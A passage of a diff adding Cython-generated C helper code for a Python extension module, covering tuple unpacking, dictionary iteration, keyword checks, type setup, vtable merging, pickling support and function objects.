PySequence_ITEM(tuple, 0); if (unlikely(!value1)) goto bad; + value2 = PySequence_ITEM(tuple, 1); if (unlikely(!value2)) goto bad; +#else + value1 = PyTuple_GET_ITEM(tuple, 0); Py_INCREF(value1); + value2 = PyTuple_GET_ITEM(tuple, 1); Py_INCREF(value2); +#endif + if (decref_tuple) { + Py_DECREF(tuple); + } + *pvalue1 = value1; + *pvalue2 = value2; + return 0; +#if CYTHON_COMPILING_IN_PYPY +bad: + Py_XDECREF(value1); + Py_XDECREF(value2); + if (decref_tuple) { Py_XDECREF(tuple); } + return -1; +#endif +} +static int __Pyx_unpack_tuple2_generic(PyObject* tuple, PyObject** pvalue1, PyObject** pvalue2, + int has_known_size, int decref_tuple) { + Py_ssize_t index; + PyObject *value1 = NULL, *value2 = NULL, *iter = NULL; + iternextfunc iternext; + iter = PyObject_GetIter(tuple); + if (unlikely(!iter)) goto bad; + if (decref_tuple) { Py_DECREF(tuple); tuple = NULL; } + iternext = __Pyx_PyObject_GetIterNextFunc(iter); + value1 = iternext(iter); if (unlikely(!value1)) { index = 0; goto unpacking_failed; } + value2 = iternext(iter); if (unlikely(!value2)) { index = 1; goto unpacking_failed; } + if (!has_known_size && unlikely(__Pyx_IternextUnpackEndCheck(iternext(iter), 2))) goto bad; + Py_DECREF(iter); + *pvalue1 = value1; + *pvalue2 = value2; + return 0; +unpacking_failed: + if (!has_known_size && __Pyx_IterFinish() == 0) + __Pyx_RaiseNeedMoreValuesError(index); +bad: + Py_XDECREF(iter); + Py_XDECREF(value1); + Py_XDECREF(value2); + if (decref_tuple) { Py_XDECREF(tuple); } + return -1; +} + +/* dict_iter */ +static CYTHON_INLINE PyObject* __Pyx_dict_iterator(PyObject* iterable, int is_dict, PyObject* method_name, + Py_ssize_t* p_orig_length, int* p_source_is_dict) { + is_dict = is_dict || likely(PyDict_CheckExact(iterable)); + *p_source_is_dict = is_dict; + if (is_dict) { +#if !CYTHON_COMPILING_IN_PYPY + *p_orig_length = PyDict_Size(iterable); + Py_INCREF(iterable); + return iterable; +#elif PY_MAJOR_VERSION >= 3 + static PyObject *py_items = NULL, *py_keys = NULL, *py_values = NULL; + PyObject **pp = NULL; + if (method_name) { + const char *name = PyUnicode_AsUTF8(method_name); + if (strcmp(name, "iteritems") == 0) pp = &py_items; + else if (strcmp(name, "iterkeys") == 0) pp = &py_keys; + else if (strcmp(name, "itervalues") == 0) pp = &py_values; + if (pp) { + if (!*pp) { + *pp = PyUnicode_FromString(name + 4); + if (!*pp) + return NULL; + } + method_name = *pp; + } + } +#endif + } + *p_orig_length = 0; + if (method_name) { + PyObject* iter; + iterable = __Pyx_PyObject_CallMethod0(iterable, method_name); + if (!iterable) + return NULL; +#if !CYTHON_COMPILING_IN_PYPY + if (PyTuple_CheckExact(iterable) || PyList_CheckExact(iterable)) + return iterable; +#endif + iter = PyObject_GetIter(iterable); + Py_DECREF(iterable); + return iter; + } + return PyObject_GetIter(iterable); +} +static CYTHON_INLINE int __Pyx_dict_iter_next( + PyObject* iter_obj, CYTHON_NCP_UNUSED Py_ssize_t orig_length, CYTHON_NCP_UNUSED Py_ssize_t* ppos, + PyObject** pkey, PyObject** pvalue, PyObject** pitem, int source_is_dict) { + PyObject* next_item; +#if !CYTHON_COMPILING_IN_PYPY + if (source_is_dict) { + PyObject *key, *value; + if (unlikely(orig_length != PyDict_Size(iter_obj))) { + PyErr_SetString(PyExc_RuntimeError, "dictionary changed size during iteration"); + return -1; + } + if (unlikely(!PyDict_Next(iter_obj, ppos, &key, &value))) { + return 0; + } + if (pitem) { + PyObject* tuple = PyTuple_New(2); + if (unlikely(!tuple)) { + return -1; + } + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(tuple, 0, key); + PyTuple_SET_ITEM(tuple, 1, value); + *pitem = tuple; + } else { + if (pkey) { + Py_INCREF(key); + *pkey = key; + } + if (pvalue) { + Py_INCREF(value); + *pvalue = value; + } + } + return 1; + } else if (PyTuple_CheckExact(iter_obj)) { + Py_ssize_t pos = *ppos; + if (unlikely(pos >= PyTuple_GET_SIZE(iter_obj))) return 0; + *ppos = pos + 1; + next_item = PyTuple_GET_ITEM(iter_obj, pos); + Py_INCREF(next_item); + } else if (PyList_CheckExact(iter_obj)) { + Py_ssize_t pos = *ppos; + if (unlikely(pos >= PyList_GET_SIZE(iter_obj))) return 0; + *ppos = pos + 1; + next_item = PyList_GET_ITEM(iter_obj, pos); + Py_INCREF(next_item); + } else +#endif + { + next_item = PyIter_Next(iter_obj); + if (unlikely(!next_item)) { + return __Pyx_IterFinish(); + } + } + if (pitem) { + *pitem = next_item; + } else if (pkey && pvalue) { + if (__Pyx_unpack_tuple2(next_item, pkey, pvalue, source_is_dict, source_is_dict, 1)) + return -1; + } else if (pkey) { + *pkey = next_item; + } else { + *pvalue = next_item; + } + return 1; +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* FixUpExtensionType */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* ValidateBasesTuple */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ +static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* PyObject_GenericGetAttrNoDict */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* SetVTable */ +static int __Pyx_SetVtable(PyTypeObject *type, void *vtable) { + PyObject *ob = PyCapsule_New(vtable, 0, 0); + if (unlikely(!ob)) + goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(PyObject_SetAttr((PyObject *) type, __pyx_n_s_pyx_vtable, ob) < 0)) +#else + if (unlikely(PyDict_SetItem(type->tp_dict, __pyx_n_s_pyx_vtable, ob) < 0)) +#endif + goto bad; + Py_DECREF(ob); + return 0; +bad: + Py_XDECREF(ob); + return -1; +} + +/* GetVTable */ +static void* __Pyx_GetVtable(PyTypeObject *type) { + void* ptr; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *ob = PyObject_GetAttr((PyObject *)type, __pyx_n_s_pyx_vtable); +#else + PyObject *ob = PyObject_GetItem(type->tp_dict, __pyx_n_s_pyx_vtable); +#endif + if (!ob) + goto bad; + ptr = PyCapsule_GetPointer(ob, 0); + if (!ptr && !PyErr_Occurred()) + PyErr_SetString(PyExc_RuntimeError, "invalid vtable found for imported type"); + Py_DECREF(ob); + return ptr; +bad: + Py_XDECREF(ob); + return NULL; +} + +/* MergeVTables */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type) { + int i; + void** base_vtables; + __Pyx_TypeName tp_base_name; + __Pyx_TypeName base_name; + void* unknown = (void*)-1; + PyObject* bases = type->tp_bases; + int base_depth = 0; + { + PyTypeObject* base = type->tp_base; + while (base) { + base_depth += 1; + base = base->tp_base; + } + } + base_vtables = (void**) malloc(sizeof(void*) * (size_t)(base_depth + 1)); + base_vtables[0] = unknown; + for (i = 1; i < PyTuple_GET_SIZE(bases); i++) { + void* base_vtable = __Pyx_GetVtable(((PyTypeObject*)PyTuple_GET_ITEM(bases, i))); + if (base_vtable != NULL) { + int j; + PyTypeObject* base = type->tp_base; + for (j = 0; j < base_depth; j++) { + if (base_vtables[j] == unknown) { + base_vtables[j] = __Pyx_GetVtable(base); + base_vtables[j + 1] = unknown; + } + if (base_vtables[j] == base_vtable) { + break; + } else if (base_vtables[j] == NULL) { + goto bad; + } + base = base->tp_base; + } + } + } + PyErr_Clear(); + free(base_vtables); + return 0; +bad: + tp_base_name = __Pyx_PyType_GetName(type->tp_base); + base_name = __Pyx_PyType_GetName((PyTypeObject*)PyTuple_GET_ITEM(bases, i)); + PyErr_Format(PyExc_TypeError, + "multiple bases have vtable conflict: '" __Pyx_FMT_TYPENAME "' and '" __Pyx_FMT_TYPENAME "'", tp_base_name, base_name); + __Pyx_DECREF_TypeName(tp_base_name); + __Pyx_DECREF_TypeName(base_name); + free(base_vtables); + return -1; +} +#endif + +/* SetupReduce */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* FetchSharedCythonModule */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ +static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ +#if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + 